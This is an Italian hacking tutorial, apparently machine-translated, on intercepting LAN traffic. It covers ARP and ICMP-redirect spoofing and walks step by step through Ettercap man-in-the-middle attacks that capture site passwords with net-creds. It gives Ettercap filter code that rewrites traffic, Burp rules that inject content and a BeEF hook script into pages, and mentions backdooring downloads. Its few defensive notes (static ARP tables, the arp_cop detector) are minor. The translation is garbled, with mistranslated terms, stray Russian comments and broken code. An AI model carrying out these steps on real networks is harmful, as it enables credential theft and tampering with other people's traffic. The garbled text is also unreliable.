casa › Installazione e configurazione › Gli hacker utilizzano per reindirizzare il traffico. Modi di attacco degli hacker. Spoofing dei dati con Burp

Gli hacker utilizzano per reindirizzare il traffico. Modi di attacco degli hacker. Spoofing dei dati con Burp

Metodi per intercettare il traffico di rete

Ascoltare la rete utilizzando i programmi di analisi di rete è il primo, il più in modo semplice intercettazione dati.

Per proteggersi dalle intercettazioni di rete, applicare programmi speciali, ad esempio AntiSniff, che sono in grado di rilevare i computer sulla rete che stanno ascoltando il traffico di rete.

Per risolvere i loro problemi, i programmi anti-sniffer utilizzano un segno speciale della presenza di dispositivi di ascolto sulla rete: la scheda di rete del computer sniffer deve trovarsi in una modalità di ascolto speciale. In modalità di ascolto, i computer in rete rispondono in modo particolare ai datagrammi IP inviati all'host sottoposto a test. Ad esempio, gli host in ascolto in genere elaborano tutto il traffico in entrata, non solo i datagrammi inviati all'indirizzo host. Esistono altri segni di comportamento sospetto dell'host che AntiSniff può riconoscere.

Indubbiamente, l'ascolto è molto utile dal punto di vista dell'aggressore, poiché consente di ottenere molte informazioni utili: password trasmesse in rete, indirizzi di computer di rete, dati riservati, lettere e così via. Tuttavia, una semplice intercettazione impedisce a un hacker di interferire con la comunicazione di rete tra due host per modificare e corrompere i dati. Per risolvere questo problema è necessaria una tecnologia più sofisticata.

Riso. 1 Richieste ARP false

Vediamo come un hacker può utilizzare il protocollo ARP per intercettare la comunicazione di rete tra gli host A e B.

Per intercettare il traffico di rete tra gli host A e B, un hacker impone il suo indirizzo IP a questi host in modo che A e B utilizzino questo indirizzo IP falso durante lo scambio di messaggi. Per imporre il proprio indirizzo IP, un hacker esegue le seguenti operazioni.

Un utente malintenzionato determina gli indirizzi MAC degli host A e B, ad esempio, utilizzando il comando nbtstat del pacchetto W2RK.
Agli indirizzi MAC identificati degli host A e B l'aggressore invia messaggi che sono risposte ARP falsificate alle richieste di risolvere gli indirizzi IP degli host negli indirizzi MAC dei computer. All'host A viene detto che l'indirizzo IP dell'host B corrisponde all'indirizzo MAC del computer dell'aggressore; all'host B viene detto che l'indirizzo IP dell'host A corrisponde anche all'indirizzo MAC del computer dell'aggressore.
Gli host A e B inseriscono gli indirizzi MAC ricevuti nelle rispettive cache ARP e quindi li utilizzano per scambiarsi messaggi. Poiché gli indirizzi IP A e B corrispondono all'indirizzo MAC del computer dell'aggressore, gli host A e B, ignari di nulla, comunicano tramite un intermediario capace di fare quello che vogliono con i loro messaggi.

Per proteggersi da tali attacchi, gli amministratori di rete devono mantenere un database con una tabella di mappatura tra gli indirizzi MAC e gli indirizzi IP dei loro computer di rete.

Sulle reti UNIX, questo tipo di attacco ARP di spoofing può essere implementato utilizzando le utilità di monitoraggio e controllo del traffico di rete del sistema, come arpredirect. Sfortunatamente, queste utilità affidabili non sembrano essere implementate nelle reti Windows. Ad esempio, sul sito NTsecurity è possibile scaricare l'utilità GrabitAII, che viene presentata come uno strumento per reindirizzare il traffico tra host di rete. Tuttavia, un controllo elementare delle prestazioni dell'utilità GrabitAII mostra che è ancora lontana dal completo successo nell'implementazione delle sue funzioni.

Per intercettare il traffico di rete, un utente malintenzionato può sostituire il vero indirizzo IP di un router di rete con il proprio indirizzo IP, ad esempio utilizzando messaggi ICMP Redirect contraffatti. Secondo RFC-1122, l'host A dovrebbe interpretare il messaggio di reindirizzamento ricevuto come una risposta a un datagramma inviato a un altro host, ad esempio B. L'host A determina le sue azioni sul messaggio di reindirizzamento in base al contenuto del messaggio di reindirizzamento ricevuto e se Redirect è impostato per reindirizzare i datagrammi da A a B su un nuovo percorso, questo è esattamente ciò che farà l'host A.

Riso. 2 Instradamento falso

Per eseguire lo spoofing, un utente malintenzionato deve conoscere alcuni dettagli sull'organizzazione rete locale, dove si trova l'host A, in particolare l'indirizzo IP del router attraverso il quale viene inviato il traffico dall'host A a B. Sapendo questo, l'attaccante formerà un datagramma IP in cui l'indirizzo IP di origine è definito come l'indirizzo IP di il router e il destinatario è specificato come host A. Nel datagramma è incluso anche un messaggio di reindirizzamento ICMP con il campo dell'indirizzo del nuovo router impostato sull'indirizzo IP del computer dell'aggressore. Dopo aver ricevuto un messaggio del genere, l'host A invierà tutti i messaggi all'indirizzo IP del computer dell'aggressore.

Per proteggersi da un simile attacco, è necessario disabilitare (ad esempio, utilizzando un firewall) sull'host A l'elaborazione dei messaggi di reindirizzamento ICMP e il comando tracert (in Unix questo è il comando tracerout) può rivelare l'indirizzo IP del computer dell'aggressore . Queste utilità sono in grado di trovare un percorso aggiuntivo apparso sulla rete locale, non previsto durante l'installazione, a meno che, ovviamente, l'amministratore di rete sia vigile.

Gli esempi di intercettazioni sopra riportati (che non sono limitati agli aggressori) convincono della necessità di proteggere i dati trasmessi in rete se i dati contengono informazioni riservate. L'unico metodo di protezione contro le intercettazioni del traffico di rete è l'uso di programmi che implementano algoritmi crittografici e protocolli di crittografia e impediscono la divulgazione e la sostituzione di informazioni segrete. Per risolvere tali problemi, la crittografia fornisce mezzi per crittografare, firmare e autenticare i messaggi trasmessi su protocolli sicuri.

L'implementazione pratica di tutti i metodi crittografici per proteggere lo scambio di informazioni è fornita da Reti VPN(Rete privata virtuale - Reti private virtuali).

Intercettazione della connessione TCP

L'attacco più sofisticato di intercettazione del traffico di rete è da considerarsi dirottamento della connessione TCP (TCP hijacking), quando un hacker, generando e inviando pacchetti TCP all'host attaccato, interrompe la sessione di comunicazione in corso con l'host. Inoltre, sfruttando le capacità del protocollo TCP per ripristinare una connessione TCP interrotta, l'hacker intercetta la sessione di comunicazione interrotta e la continua al posto del client disconnesso.

TCP (Transmission Control Protocol) è uno dei protocolli di trasporto di base. Strato OSI, che consente di stabilire connessioni logiche su un canale di comunicazione virtuale. Su questo canale i pacchetti vengono trasmessi e ricevuti con la registrazione della loro sequenza, il flusso dei pacchetti viene controllato, viene organizzata la ritrasmissione dei pacchetti distorti e alla fine della sessione il canale di comunicazione viene interrotto. TCP è l'unico protocollo protocollo di base della famiglia TCP/IP, che dispone di un avanzato sistema di identificazione dei messaggi e delle connessioni.

Panoramica sugli sniffer di pacchetti software

Tutti gli sniffer software possono essere suddivisi approssimativamente in due categorie: sniffer che supportano l'avvio da riga di comando e sniffer con un'interfaccia grafica. Allo stesso tempo, notiamo che esistono sniffer che combinano entrambe queste caratteristiche. Inoltre, gli sniffer differiscono tra loro per i protocolli supportati, la profondità di analisi dei pacchetti intercettati, la possibilità di configurare filtri e la possibilità di compatibilità con altri programmi.

Di solito la finestra di qualsiasi sniffer con GUIè composto da tre aree. Il primo mostra un riepilogo dei pacchetti catturati. Tipicamente, quest'area mostra un minimo di campi, vale a dire: tempo di acquisizione del pacchetto; Indirizzi IP del mittente e del destinatario del pacchetto; Indirizzi MAC di origine e destinazione dei pacchetti, indirizzi di porte di origine e destinazione; tipo di protocollo (rete, trasporto o livello applicativo); alcune informazioni sintetiche sui dati intercettati. La seconda area visualizza le informazioni statistiche sul singolo pacchetto selezionato e, infine, la terza area presenta il pacchetto in forma esadecimale o in caratteri - ASCII.

Quasi tutti gli sniffer di pacchetti consentono l'analisi dei pacchetti decodificati (motivo per cui gli sniffer di pacchetti sono anche chiamati analizzatori di pacchetti o analizzatori di protocollo). Lo sniffer distribuisce i pacchetti intercettati per livelli e protocolli. Alcuni analizzatori di pacchetti sono in grado di riconoscere il protocollo e visualizzare le informazioni catturate. Questo tipo di informazioni vengono solitamente visualizzate nella seconda area della finestra dello sniffer. Ad esempio, qualsiasi sniffer è in grado di riconoscere il protocollo TCP e gli sniffer avanzati possono determinare quale applicazione ha generato questo traffico. La maggior parte degli analizzatori di protocollo riconosce oltre 500 protocolli diversi e può descriverli e decodificarli per nome. Più informazioni lo sniffer è in grado di decodificare e presentare sullo schermo, meno sarà necessario decodificarle manualmente.

Un problema in cui possono incorrere gli sniffer di pacchetti è l'impossibilità di identificare correttamente un protocollo utilizzando una porta diversa da quella predefinita. Ad esempio, per migliorare la sicurezza, alcune applicazioni note potrebbero essere configurate per utilizzare porte diverse da quelle predefinite. Quindi, al posto della tradizionale porta 80 riservata al web server, dato server può essere costretto a riconfigurare sulla porta 8088 o qualsiasi altra. Alcuni analizzatori di pacchetti in questa situazione non sono in grado di determinare correttamente il protocollo e visualizzare solo le informazioni sul protocollo di livello inferiore (TCP o UDP).

Esistono sniffer software forniti con moduli analitici software come plug-in o moduli integrati che consentono di creare report con utili informazioni analitiche sul traffico intercettato.

Un'altra caratteristica della maggior parte degli sniffer di pacchetti software è la capacità di configurare i filtri prima e dopo l'acquisizione del traffico. I filtri separano determinati pacchetti dal traffico generale secondo un determinato criterio, il che consente di eliminare informazioni non necessarie durante l'analisi del traffico.

Alternative a Ettercap

Ettercap è il programma di attacco man-in-the-middle più popolare, ma è il migliore? In tutto il manuale vedrai che Ettercap non viene quasi mai utilizzato da solo, che l'uno o l'altro programma è sempre allineato con lui in una catena di elaborazione del traffico. Forse questo aggiunge flessibilità, in generale, questo approccio è al centro di UNIX: un programma esegue un'attività e l'utente finale combina vari programmi per ottenere il risultato desiderato. Con questo approccio, il codice del programma è più facile da mantenere; tali "mattoni" in miniatura possono essere utilizzati per costruire un sistema di qualsiasi complessità e flessibilità. Tuttavia, avere cinque console aperte con compiti diversi, il cui lavoro mira a ottenere un unico risultato, non è molto conveniente, è solo più difficile, c'è la possibilità di commettere un errore ad un certo punto e l'intero sistema configurato funzionerà al minimo.

Net-Creds annusa:

URL visitati
inviato richieste POST
accessi/password da moduli HTTP
accessi/password per l'autenticazione HTTP di base
Ricerche HTTP
Login/password FTP
Login/password IRC
Login/password POP
Login/password IMAP
Login/password Telnet
Login/password SMTP
Stringa della comunità SNMP
tutti i protocolli NTLMv1/v2 supportati come HTTP, SMB, LDAP, ecc.
Kerberos

Una buona selezione di immagini intercettate e la rete derivante è più semplice a questo riguardo: mostra solo le immagini intercettate.

Passa la macchina alla modalità di inoltro.

echo "1" > /proc/sys/net/ipv4/ip_forward

Esegui Ettercap con la GUI (-G ):

Ettercap-G

Ora seleziona Host, nella sottovoce Scansione per host. Una volta completata la scansione, seleziona Elenco host:

Come Target1, seleziona il router (Aggiungi a Target 1 ), come Target2, seleziona il dispositivo che attaccherai (Aggiungi a Target 2 ).

Ma qui può sorgere il primo intoppo, soprattutto se gli host sono tanti. In varie istruzioni, incluso il video presentato sopra, gli autori salgono sulla macchina di destinazione (per qualche motivo, tutti hanno Windows lì) e utilizzano il comando per guardare l'IP di questa macchina sulla rete locale. D'accordo, questa opzione è inaccettabile per le condizioni reali.

Se esegui la scansione con , puoi ottenerne alcuni Informazioni aggiuntive sugli host, più precisamente, sul produttore della scheda di rete:

nmap -sn 192.168.1.0/24

Se i dati non sono ancora sufficienti, puoi eseguire una scansione con la definizione del sistema operativo:

nmap -O 192.168.1.0/24

Come puoi vedere, la macchina con IP 192.168.1.33 si è rivelata essere Windows, se questo non è un segno dall'alto, allora cos'è? 😉 lol

Questo è ciò che aggiungiamo come secondo obiettivo.

Ora vai alla voce di menu Mitm. Qui seleziona Avvelenamento ARP... Seleziona la casella di controllo Sniffa connessioni remote.

Iniziamo la raccolta, in una finestra lanciamo

Crediti netti

in un altro (entrambi i programmi possono essere eseguiti senza opzioni)

rete derivante

La raccolta dei dati è iniziata immediatamente.

Sul lato destro, la rete derivante ha aperto un'altra finestra che mostra le immagini catturate. Nella finestra net-creds, vediamo i siti visitati e le password intercettate:

1.2 Ettercap + Suite Burp
3. Visualizza i dati (siti Web visitati e password acquisite) in Ettercap

Nel menu Visualizza sono a nostra disposizione le schede Connessioni e Profili. Puoi anche selezionare la casella Risolvi indirizzi IP. Le connessioni sono, ovviamente, connessioni. Ettercap raccoglie i profili in memoria per ogni host che scopre. Qui vengono raccolti utenti e password. In questo caso, i profili con i dati dell'account acquisiti (password) sono contrassegnati con una croce:

Non fare troppo affidamento sui profili: ad esempio, vengono contrassegnati accessi e password intercettati per FTP e altri servizi, per i quali il programma può interpretare inequivocabilmente le informazioni ricevute come credenziali. Ciò non include, ad esempio, i dati di autenticazione di base, login e password immessi nei moduli web.

In Connections, i dati più promettenti sono contrassegnati da un asterisco:

È possibile fare doppio clic su queste voci per visualizzare i dettagli:

Per non cercare queste stelle nell'intero elenco, puoi ordinarle in base a questo campo e saranno tutte in alto o in basso:

Autenticazione di base rilevata:

Password di accesso per Yandex (evidenziata di seguito):

Queste sono le credenziali intercettate per Vkontakte:

Inoltre, i dati più interessanti vengono raccolti nella console inferiore:

Se vuoi salvare i risultati del programma, usa queste opzioni (specifica i tasti all'avvio di Ettercap:

Opzioni di registrazione: -w, --write scrivi i dati catturati su pcapfile -L, --log scrivi tutto il traffico su questo -l, --log-info scrivi solo le informazioni passive su questo -m, --log-msg scrivi tutti i messaggi a questo -c, --compress usa la compressione gzip per i file di registro

4. Sostituzione dei dati al volo in Ettercap
4.1 Utilizzo di filtri Ettercap personalizzati

Nota: in tutti i miei test, i filtri Ettercap non hanno funzionato. È difficile capire se sia nelle mani, nelle caratteristiche hardware o in un bug nel programma stesso... Ma per la versione 0.8.2 (l'ultima al momento), c'è una segnalazione di bug sui problemi con i filtri. In generale, a giudicare dalle segnalazioni di bug e dai forum, i filtri cadono spesso o non funzionano affatto per molto tempo. C'è un ramo che è stato modificato 5 mesi fa https://github.com/Ettercap/ettercap/tree/filter-improvements, ad es. miglioramenti del filtro (con miglioramenti del filtro). Sono stati effettuati un'ampia varietà di test per questo ramo e per la versione dal repository, sono stati testati vari filtri in condizioni diverse, è stato impiegato molto tempo, ma non ci sono stati risultati. A proposito, per installare la versione dei miglioramenti del filtro in Kali Linux, devi fare questo:

sudo apt-get rimuovi ettercap-graphic ettercap-common sudo apt-get install git debhelper bison controlla cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b miglioramenti del filtro https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DOCS =On ../make sudo make install

In generale, se i tuoi filtri non funzionano, non sei solo. Nelle istruzioni per Ettercap non posso tralasciare l'argomento dei filtri, quindi verranno comunque presi in considerazione.

Finora abbiamo utilizzato Ettercap per lo spoofing ARP. Questa è un'applicazione molto superficiale. Grazie ai filtri personalizzati possiamo intervenire e modificare il traffico al volo. I filtri devono essere contenuti in file separati e devono essere compilati con il programma Etterfilter prima dell'uso. Anche se la documentazione a cui è collegato sembra essere scarsa, ma abbinata agli esempi seguenti, ti consentirà di scrivere alcuni filtri piuttosto interessanti.

Creiamo il nostro primo filtro, sostituirà tutte le immagini con questo:

In un file denominato img_replacer.filter copia:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accetta-Encoding", "Accetta-Rubbish!"); # nota: la stringa di sostituzione ha la stessa lunghezza dell'originale msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); sostituisci("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); sostituisci("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); sostituisci("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); )

Compila il file:

Etterfilter img_replacer.filter -o img_replacer.ef

Risultati della compilazione:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 tabelle di protocollo caricate: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 costanti caricate: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Parsing source file "img_replacer.filter" fatto. Apertura del meta-albero completata. Conversione delle etichette in offset reali completata. Scrittura dell'output su "img_replacer.ef" completata. -> Script codificato in 18 istruzioni.

L'opzione -F indica al programma di caricare il filtro dal file che segue l'opzione. Dopo la compilazione, il nome del nostro nuovo file con il filtro è img_replacer.ef, quindi il comando diventa:

Ettercap -G -F img_replacer.ef

Nota: quando monitori il traffico web, i pacchetti che vedi potrebbero essere in formato crittografato. Per lavoro efficace filtri, Ettercap ha bisogno del traffico nel modulo testo semplice. Secondo alcune osservazioni, il tipo di codifica utilizzata dalle pagine web è "Accept-Encoding: gzip, deflate"

Di seguito è riportato un filtro che sovrascrive la codifica, forzando la comunicazione sotto forma di testo semplice:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replace("gzip", " "); # nota: quattro spazi nella stringa msg a replace ("gzip cancellato\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # nota: sette spazi nella stringa di sostituzione msg("sgonfiato\n"); ) )

La sintassi per scrivere i filtri è descritta in dettaglio, e poi alcuni altri esempi:

# sostituisce il testo nel pacchetto: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter ran"); ) # mostra il messaggio se la porta tcp è 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("pacchetto SSH\n"); ) ) # registra tutto il traffico telnet , eseguire anche ./program per pacchetto if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log ") ; exec("./program"); ) ) # registra tutto il traffico tranne http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log(DATA.data , "./logfile.log"); ) # alcune operazioni di payload dei pacchetti if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "modificato"; DATA .data + 20 = 0x4445; ) # elimina tutti i pacchetti contenenti "ettercap" if (search(DECODED.data, "ettercap")) ( msg("qualcuno sta parlando di noi...\n"); drop( ); kill( ); ) # scrive i pacchetti ssh decrittografati corrispondenti alla regex if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # uccide i pacchetti if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Spoofing dei dati con Burp

Lanciamo Ettercap e Burp come descritto nel paragrafo 1.2 oppure nel paragrafo 2.2.

In Burp vai su Proxy -> Opzioni. Troviamo Match e Sostituisci lì. Fare clic su Aggiungi per aggiungere una nuova regola.

L'intestazione della richiesta è l'intestazione della richiesta
Richiedi corpo - richiedi corpo
Intestazione della risposta: intestazione della risposta
Corpo di risposta - corpo di risposta
Richiedi nome parametro: richiedi il nome del parametro
Richiedi valore parametro: richiedi il valore del parametro
Prima riga della richiesta: la prima riga della richiesta

Se è necessario modificare i dati trasmessi con il metodo GET, ciò vale per le intestazioni.

Nel markup HTML esiste anche qualcosa come head (tag head). Quelli menzionati sopra non hanno nulla a che fare con questa rubrica. Un po' più in alto si dice delle intestazioni dei pacchetti. Se vuoi cambiare il contenuto Pagine HTML, allora dovresti sempre scegliere Corpo della risposta invece di Intestazione della richiesta, anche se intendi modificare il contenuto del tag head (ad esempio, il titolo).

Se non hai familiarità con espressioni regolari, quindi, in linea di principio, va bene: l'HTML perdona molto e ciò che non capisce, semplicemente lo ignora: puoi usarlo. Se sai usare le espressioni regolari, allora ti rispetto.)))

Ad esempio, creiamo una nuova regola, modifichiamo l'intestazione della richiesta nel corpo della risposta. Nella regola stessa, cambieremo

senza titolo

Seleziona la casella per la corrispondenza Regex .

Ora su tutti i siti (senza HTTPS) al posto del titolo ci sarà No Title:

Inserisci una riga arbitraria dopo il tag body (sarà la prima riga nel testo). L'intestazione della richiesta viene modificata nel corpo della risposta. Noi cambiamo

Seleziona la casella per la corrispondenza Regex .

Nell'angolo in alto a destra (a seconda del layout) appare la scritta "I am cool!". Puoi inserire CSS, codice JavaScript, qualsiasi testo, qualsiasi cosa. In genere puoi eliminare tutto dalla pagina e quindi riempirla con i tuoi contenuti: tutto dipende dalla tua immaginazione.

C'era l'idea di modificare leggermente ciascun modulo in modo che i dati vengano inviati al server originale e al server dell'aggressore (implementare l'invio multiplo per ciascun modulo). Ma avendo ragionato che se i dati trasmessi non sono crittografati e abbiamo accesso ad essi, li vediamo comunque, non è necessario inviarli a nessun server. Tuttavia, se qualcuno ne ha bisogno, un esempio davvero funzionante di invio di dati da un modulo a più server contemporaneamente.

5. Collegamento manzo

Per iniziare a utilizzare le funzionalità di BeEF, dobbiamo incorporare un file JavaScript nell'HTML, solitamente una riga come:

I due metodi successivi differiscono solo nel metodo di incorporamento di questa stringa.

5.1 Agganciatura BeEF con filtri Ettercap

[sezione da preparare in seguito]

5.2 Attaccare il manzo con Burp

È necessario iniziare esattamente come è scritto nel paragrafo 4.2. Ma invece di sostituire le intestazioni e aggiungere testo al sito, inseriremo il codice JavaScript sotto forma di stringa:

Nel mio caso, questo file è disponibile sull'IP 192.168.1.36 sulla porta 3000. Il file si chiama hook.js (puoi modificarlo nelle impostazioni). Quelli. nel mio caso, devo iniettare la riga:

Questo può essere fatto, ad esempio, creando una nuova regola, modificando l'intestazione della richiesta nel corpo della risposta. Nel codice HTML stesso dovrebbe esserci una sostituzione

Ottimo, quando apri un qualsiasi sito che non dispone di HTTPS, nel codice HTML viene inserito un codice JavaScript, che ti consente di raccogliere informazioni attraverso un browser agganciato ed eseguire vari attacchi:

6. Infezione con backdoor

Puoi sostituire e infettare i file eseguibili sia con l'aiuto dei filtri Ettercap [che per qualche motivo non funzionano da molto tempo], sia con l'aiuto di applicazioni di terze parti. Ad esempio, BDFProxy può farlo al volo. Sfortunatamente, BDFProxy non è ancora in grado di riprendersi dall'aggiornamento Backdoor Factory di aprile (nel 2016): in Python, il pacchetto libmproxy è stato rinominato mitmproxy. Per BDFProxy, il pacchetto libmproxy è una dipendenza necessaria; il programma non funzionerà senza questo pacchetto. Pertanto ora, prima della “riparazione” di BDFProxy, non è possibile utilizzarlo, perché anche con Backdoor Factory installato, il programma BDFProxy lamenta la mancanza della libreria libmproxy...

Un'operazione simile può essere fatta con Burp Suite. Viene presentato l'algoritmo passo passo, non ha senso riscriverlo di nuovo in questa sezione.

7. Utilizzo dei plugin Ettercap

È possibile trovare informazioni sui plugin Ettercap. Ci sono parecchi plugin, quelli descritti di seguito mi sembrano i più interessanti.

I plugin possono essere collegati all'avvio di Ettercap, per questo c'è un'opzione:

P, --plugin esegui questo

I plugin possono anche essere caricati dalla GUI:

[MATERIALE IN PREPARAZIONE]

7.1 arp_cop

Segnala attività ARP sospette monitorando passivamente le richieste/risposte ARP. Potrebbe segnalare tentativi di avvelenamento ARP o semplici conflitti IP o modifiche IP. Se stai creando un elenco iniziale di host, il plug-in funzionerà in modo più accurato.

Ettercap -TQP arp_cop //

Un esempio di rilevamento di spoofing ARP reale:

Espandere

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // password per mial: ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team In ascolto su: eth0 -> 08:00:27:A3:08:4A 192.168.1.36/ 255.255.255.0 fe80::a00:27ff:fea3:84a/64 La dissezione SSL richiede uno script "redir_command_on" valido nel file etter.conf Privilegi ceduti a EUID 65534 EGID 65534... 33 plugin 42 dissettori di protocollo 57 porte monitorate 20530 mac impronta digitale del fornitore 1766 impronta digitale del sistema operativo tcp 2182 servizi conosciuti Randomizzazione di 255 host per la scansione... Scansione dell'intera maschera di rete per 255 host... * |===================== =============================>|| 100,00 % 3 host aggiunti all'elenco degli host... Avvio di Unified sniffing... Interfaccia solo testo attivata... Premi "h" per la guida in linea Attivazione del plugin arp_cop... arp_cop: plugin in esecuzione... arp_cop: (nuovo host ) 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE ) 192.168.1.35 finge di be 192.168.1.1 arp_cop: (ATTENZIONE ) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE ) 192.168.1.35 finge di essere 192.168 .1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168 .1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.16 8.1.1 arp_cop: (ATTENZIONE) 192.168 .1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168 .1.35 finge di essere 192.168.1.1 p_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_ poliziotto: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) RNING) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.3 5 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192. 168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.1 68.1.1 arp_cop: (ATTENZIONE ) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 92.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168 .1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 .1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1.35 finge di essere 192. 168.1.1 arp_cop: (ATTENZIONE ) 192.168.1.35 finge di essere 192.168.1.1 arp_cop: (ATTENZIONE) 192.168.1 .35 finge di essere 192.168.1.1 ................................. ..

7.2 aggiunta automatica

Aggiungerà automaticamente nuove vittime non appena si collegheranno all'ARP di avvelenamento da mitm. Cerca richieste ARP sulla rete locale e, se trovate, il plugin aggiungerà l'host all'elenco delle vittime se l'elenco è stato specificato come TARGET. L'host viene aggiunto quando viene vista una richiesta arp da esso.

7.3 chk_veleno

Controlla se i moduli arp veleno in ettercap hanno esito positivo. Invia pacchetti eco ICMP contraffatti a tutte le vittime di avvelenamento, fingendo di essere ciascuna vittima. Può ricevere una risposta ICMP con il nostro indirizzo MAC come destinazione, il che significa che l'avvelenamento tra questi due obiettivi ha avuto successo. Controlla entrambi i percorsi di ogni connessione.

7.4 dns_spoof

Questo plugin interrompe le richieste DNS e risponde con una risposta contraffatta (falsa). Puoi scegliere a quale indirizzo deve rispondere il plugin modificando il file etter.dns. Il plugin intercetta le richieste A, AAAA, PTR, MX, WINS, SRV e TXT. Se si trattava di una query A, il nome viene cercato nel file e viene restituito l'indirizzo IP (è possibile utilizzare caratteri jolly nel nome).

Lo stesso vale per le richieste AAAA.

7.5 trova_conn

Un plugin molto semplice che ascolta le richieste ARP per mostrarti tutti i target con cui l'host vuole comunicare. Può anche aiutarti a trovare indirizzi su LAN sconosciute.

ettercap -TQzP trova_conn ettercap -TQu -i eth0 -P trova_conn

7.6 find_ettercap

Tenta di identificare i pacchetti ettercap inviati sulla LAN. Può essere utile per rilevare qualcuno che tenta di utilizzare ettercap. Non fare affidamento su di esso al 100% poiché i test funzionano solo per sequenze/numeri ID specifici.

7.7 scan_poisoner

